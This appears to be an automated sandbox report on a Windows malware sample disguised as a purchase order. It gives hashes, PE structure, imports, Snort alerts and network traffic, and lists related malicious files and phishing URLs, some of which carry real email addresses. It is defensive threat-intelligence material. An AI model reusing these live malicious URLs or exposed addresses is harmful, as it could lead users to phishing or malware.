www.cashintl.com	Purchase Order 40,7045.exe	Get hash	malicious	Browse	54.208.77.124
	T66DUJYHQE.exe	Get hash	malicious	Browse	54.208.77.124
	sXNQG9jqhR.exe	Get hash	malicious	Browse	54.208.77.124
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	54.208.77.124

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DXTL-HKDXTLTseungKwanOServiceHK	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	154.86.218.70
	Order specs19.11.20.exe	Get hash	malicious	Browse	154.86.212.132
	INQUIRY.exe	Get hash	malicious	Browse	154.219.198.139
	PO0119-1620 LQSB 0320 Siemens.exe	Get hash	malicious	Browse	185.238.225.15
	moses.exe	Get hash	malicious	Browse	154.214.81.76
	H4hs204fyj.exe	Get hash	malicious	Browse	45.203.105.90
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	45.194.171.26
	feJbFA6woA.exe	Get hash	malicious	Browse	154.214.156.184
	Bonifico n.1101202910070714.exe	Get hash	malicious	Browse	154.80.149.76
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	175.29.246.111
	tbzcpAZnBK.exe	Get hash	malicious	Browse	154.219.112.132
	w4fNtjZBEH.exe	Get hash	malicious	Browse	154.85.232.76
	ORDER LIST.exe	Get hash	malicious	Browse	154.84.82.67
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	45.194.171.26
	rvNT4kv6bg.exe	Get hash	malicious	Browse	154.214.142.220
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	45.194.171.26
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	43.255.109.79
	PSJ21840.exe	Get hash	malicious	Browse	154.219.112.132
	HussCrypted.exe	Get hash	malicious	Browse	154.84.86.29
	#Uc720#Ud2f0#Uc544#Uc774#Ud14c#Ud06c-#Ubc1c#Uc8fc#Uc11c #Uc1a1#Ubd80#Uc758#Uac74.exe.exe	Get hash	malicious	Browse	45.203.120.102
SOFTLAYERUS	http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1	Get hash	malicious	Browse	169.50.137.176
	http://septterror.tripod.com/the911basics.html	Get hash	malicious	Browse	169.50.137.190
	dde1df2ac5845a19823cabe182fcd870.exe	Get hash	malicious	Browse	50.23.197.94
	https://variationnotice.carrd.co/	Get hash	malicious	Browse	75.126.175.140
	https://mrsklzspproject.us-south.cf.appdomain.cloud/redirect/?email=david.termondt@zultys.com	Get hash	malicious	Browse	169.47.124.25
	https://11d1b1a708d345629044c3ad40d1ecce.svc.dynamics.com/t/r/u-pVz1saxqvYoENC2gfNyfmqxmRTA6ywUgXOHYh5EPA#aurore@idcom-france.com:3Tk39002=4000	Get hash	malicious	Browse	169.46.89.154
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	159.253.128.188
	http://tinyurl.com	Get hash	malicious	Browse	159.253.128.188
	http://static.publicocdn.com	Get hash	malicious	Browse	159.253.128.183
	LnzGySrnuh.exe	Get hash	malicious	Browse	169.50.76.149
	K4LBgqdSZB.exe	Get hash	malicious	Browse	43.226.229.43
	BbQr9AZ6nv.exe	Get hash	malicious	Browse	169.45.3.11
	oV4bV6Uj6g.exe	Get hash	malicious	Browse	169.61.11.75
	n4uladudJS.exe	Get hash	malicious	Browse	119.81.172.165
	http://googledrive-eu.com	Get hash	malicious	Browse	173.192.101.21
	https://cloudsrvs.eu-gb.mybluemix.net/&p2=http:/ww.voicemailnote/#Andy.Hamman@crowe.co.uk	Get hash	malicious	Browse	141.125.73.154
	Y7i2sl4Foh.exe	Get hash	malicious	Browse	50.23.197.94
	NzI1oP5E74.exe	Get hash	malicious	Browse	119.81.172.165
	https://meetingwithmd.eu-gb.cf.appdomain.cloud/redirect/?email=info@voegtle.de	Get hash	malicious	Browse	158.175.115.200
	https://mp3-youtube.download/fr/secure-audio-converter	Get hash	malicious	Browse	173.192.101.24
GODADDY-AMSDE	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	160.153.136.3
	ORDER INQUIRY.exe	Get hash	malicious	Browse	160.153.136.3
	DEBIT NOTE DB-1130.exe	Get hash	malicious	Browse	160.153.128.7
	esm-Fichero-ES.msi	Get hash	malicious	Browse	160.153.143.165
	eLaaw7SqMi.exe	Get hash	malicious	Browse	160.153.136.3
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	160.153.136.3
	dB7XQuemMc.exe	Get hash	malicious	Browse	160.153.128.3
	feJbFA6woA.exe	Get hash	malicious	Browse	160.153.136.3
	PPO040963RG02.exe	Get hash	malicious	Browse	160.153.18.187
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	160.153.136.3
	w4fNtjZBEH.exe	Get hash	malicious	Browse	160.153.129.28
	ORDER LIST.exe	Get hash	malicious	Browse	160.153.128.7
	#U306b#U4fee 2020-09-19.doc	Get hash	malicious	Browse	160.153.252.3
	2GYiwgv3lC.exe	Get hash	malicious	Browse	160.153.136.3
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	160.153.138.219
	https://www.stafftrainingsolutions.co.uk/STICK/PageUpdated/ampt.html?app=adviserinfo@uesp.org&subdomain=http://uesp.org	Get hash	malicious	Browse	160.153.162.141
	new requests.exe	Get hash	malicious	Browse	160.153.136.3
	http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=	Get hash	malicious	Browse	160.153.131.204
	http://crm.time4you.de/sugarcrm/custom/ch1/1.html	Get hash	malicious	Browse	160.153.133.145
	index.html.doc	Get hash	malicious	Browse	160.153.138.219

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.407144975942058
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Purchase Order 40,7045.exe
File size:	347136
MD5:	2566aac2faf57e27d8778f2c61bac6d3
SHA1:	b163ec807fe59a0f85f2d964fe1e8ffa8adab77e
SHA256:	7d4d5ddf016f84445c94bf5ee4d715be092f8711b70ebd17f48f2956fba0487d
SHA512:	f4e1fabcb5036f7adda5789f91dfdcfeada6dbfb0c8ed33ff76acf7d42f8f0e74041332684310572bd449b23ec5a7f10ef25245f78007fa70a10c14d646c6250
SSDEEP:	6144:UO3eKE9waM2lOA8IOvHPHO1tOmxiMuCY3Ua0d0feBBK10r2GYy08:veKE9wLaOLhHPH83EMlarfk2GY6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(k-.l.C.l.C.l.C..\|..{.C..\|..Z.C..\|....C.er..c.C.l.B...C..\|..m.C..\|..m.C..\|..m.C.Richl.C.........................PE..L......_...

File Icon


Icon Hash:	34ecc4d0f0e8ccd4

Static PE Info

General
Entrypoint:	0x40af48
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB8ABA9 [Sat Nov 21 05:54:49 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fe91cd96af1348223f21fb3d7bcc19bd

Entrypoint Preview

Instruction
call 00007F7A188004C2h
jmp 00007F7A187F8F1Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [004253E0h+ecx*8]
je 00007F7A187F90A5h
inc ecx
cmp ecx, 2Dh
jc 00007F7A187F9083h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F7A187F90A0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [004253E4h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F7A187FECD5h
test eax, eax
jne 00007F7A187F9098h
mov eax, 00425548h
ret
add eax, 08h
ret
call 00007F7A187FECC2h
test eax, eax
jne 00007F7A187F9098h
mov eax, 0042554Ch
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F7A187F9077h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F7A187F9017h
pop ecx
mov esi, eax
call 00007F7A187F9051h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [00425810h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-4Ch], esi
mov dword ptr [ebp-48h], ebx
cmp dword ptr [esi+14h], ebx

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23cb0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x42e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31000	0x1624	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x1c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d3b7	0x1d400	False	0.554295205662	data	6.66141080101	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x5734	0x5800	False	0.364657315341	data	4.99118455339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x25000	0x6880	0x3800	False	0.69580078125	data	6.63430076237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x42e0	0x4400	False	0.0521599264706	data	2.2997665352	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x31000	0x213e	0x2200	False	0.525735294118	data	5.09060810438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c0a0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294967040	English	United States
RT_GROUP_ICON	0x302c8	0x14	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, GetExitCodeProcess, HeapReAlloc, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, CreateProcessA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapSize, IsValidCodePage, GetOEMCP, GetACP, GetStringTypeW, WriteConsoleW, SetStdHandle, CompareStringW, SetEnvironmentVariableA, GetUserDefaultLCID, VirtualProtect, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, GetProcAddress, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, LCMapStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, GetFileAttributesA, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LoadLibraryW, GetLocaleInfoW, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, CreateFileW
MSVFW32.dll	ICGetInfo, ICSeqCompressFrameStart, ICCompressorChoose, ICSeqCompressFrame
AVIFIL32.dll	AVIMakeStreamFromClipboard, AVIClearClipboard, AVIStreamOpenFromFile, AVIStreamRead
wsnmp32.dll
SETUPAPI.dll	SetupDiCreateDeviceInterfaceRegKeyA, SetupDiInstallClassExA, SetupDiEnumDriverInfoW, SetupDiBuildDriverInfoList, SetupRenameErrorA, SetupDefaultQueueCallback, SetupInstallFilesFromInfSectionA
SHELL32.dll	SHFileOperationA, ShellHookProc, DragQueryFile
COMDLG32.dll	ReplaceTextW, ReplaceTextA, PrintDlgW, PrintDlgExW, CommDlgExtendedError, PrintDlgExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/21/20-09:23:25.026355	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49730	34.102.136.180	192.168.2.3
11/21/20-09:24:08.218798	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49750	13.248.196.204	192.168.2.3
11/21/20-09:24:23.844414	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49752	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:23:14.097827911 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.234519958 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.234675884 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.234828949 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.371210098 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377899885 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377935886 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377959967 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.378113031 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.378142118 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.378202915 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.514729977 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:19.560575008 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.694499969 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.694645882 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.695023060 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.828794003 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834455013 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834506989 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834763050 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.834836960 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.968734026 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:24.894366026 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.911004066 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:24.911156893 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.911351919 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.927881956 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026355028 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026390076 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026591063 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:25.026663065 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:25.043345928 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:30.204859018 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.341794014 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:30.341933012 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.342092037 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.514624119 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:30.514862061 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.514910936 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.652647018 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:35.572374105 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.598022938 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:35.598149061 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.598393917 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.624041080 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:35.624209881 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.624253035 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.649920940 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:40.967447996 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.173218966 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.173377037 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.173491001 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.379344940 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.384908915 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.386229992 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.386396885 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.592365026 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:46.567965984 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.680968046 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.681092024 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.681252956 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.793874025 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794529915 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794562101 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794747114 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.794909000 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.907485962 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:51.984683990 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.176573992 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:52.176731110 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.176956892 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.368932962 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:52.368985891 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:57.449476004 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.488097906 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.488246918 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.488390923 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.526587009 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.585954905 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586019993 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586061954 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586092949 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586122036 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586267948 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586354971 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586365938 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586369991 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.624963999 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:24:02.661523104 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.763997078 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:02.764127970 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.764219999 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.868865013 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:02.869981050 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.870037079 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.972486973 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:08.059351921 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.075472116 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:08.075654030 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.075890064 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.091875076 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:08.218797922 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:08.218846083 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:08.219089985 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.219173908 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.235389948 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:13.269962072 CET	49751	80	192.168.2.3	198.54.117.212
Nov 21, 2020 09:24:13.440390110 CET	80	49751	198.54.117.212	192.168.2.3
Nov 21, 2020 09:24:13.440480947 CET	49751	80	192.168.2.3	198.54.117.212
Nov 21, 2020 09:24:13.440628052 CET	49751	80	192.168.2.3	198.54.117.212
Nov 21, 2020 09:24:13.611021042 CET	80	49751	198.54.117.212	192.168.2.3
Nov 21, 2020 09:24:13.611089945 CET	80	49751	198.54.117.212	192.168.2.3
Nov 21, 2020 09:24:23.712651968 CET	49752	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:24:23.729258060 CET	80	49752	34.102.136.180	192.168.2.3
Nov 21, 2020 09:24:23.729382038 CET	49752	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:24:23.729590893 CET	49752	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:24:23.745955944 CET	80	49752	34.102.136.180	192.168.2.3
Nov 21, 2020 09:24:23.844413996 CET	80	49752	34.102.136.180	192.168.2.3
Nov 21, 2020 09:24:23.844460011 CET	80	49752	34.102.136.180	192.168.2.3
Nov 21, 2020 09:24:23.844739914 CET	49752	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:24:23.844856977 CET	49752	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:24:23.861346960 CET	80	49752	34.102.136.180	192.168.2.3
Nov 21, 2020 09:24:29.184154987 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:29.440289021 CET	80	49753	45.194.171.26	192.168.2.3
Nov 21, 2020 09:24:29.440572023 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:29.440793037 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:29.693656921 CET	80	49753	45.194.171.26	192.168.2.3
Nov 21, 2020 09:24:29.849004984 CET	80	49753	45.194.171.26	192.168.2.3
Nov 21, 2020 09:24:29.849056959 CET	80	49753	45.194.171.26	192.168.2.3
Nov 21, 2020 09:24:29.849320889 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:29.849431038 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:29.849560976 CET	49753	80	192.168.2.3	45.194.171.26
Nov 21, 2020 09:24:30.102456093 CET	80	49753	45.194.171.26	192.168.2.3
Nov 21, 2020 09:24:40.287276983 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.425659895 CET	80	49755	74.208.236.115	192.168.2.3
Nov 21, 2020 09:24:40.429528952 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.429598093 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.567848921 CET	80	49755	74.208.236.115	192.168.2.3
Nov 21, 2020 09:24:40.573529005 CET	80	49755	74.208.236.115	192.168.2.3
Nov 21, 2020 09:24:40.573551893 CET	80	49755	74.208.236.115	192.168.2.3
Nov 21, 2020 09:24:40.573564053 CET	80	49755	74.208.236.115	192.168.2.3
Nov 21, 2020 09:24:40.573690891 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.573740959 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.573754072 CET	49755	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:24:40.711841106 CET	80	49755	74.208.236.115	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:22:24.581501007 CET	64185	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:24.619348049 CET	53	64185	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:25.406692028 CET	65110	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:25.442279100 CET	53	65110	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:26.529371023 CET	58361	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:26.556273937 CET	53	58361	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:28.236915112 CET	63492	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:28.264113903 CET	53	63492	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:44.490503073 CET	60831	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:44.526331902 CET	53	60831	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:51.779208899 CET	60100	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:51.806281090 CET	53	60100	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:00.907176018 CET	53195	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:00.934344053 CET	53	53195	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:01.113241911 CET	50141	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:01.150213003 CET	53	50141	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:01.818069935 CET	53023	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:01.845236063 CET	53	53023	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:02.775262117 CET	49563	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:02.802472115 CET	53	49563	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:05.000329018 CET	51352	53	192.168.2.3	8.8.8.8
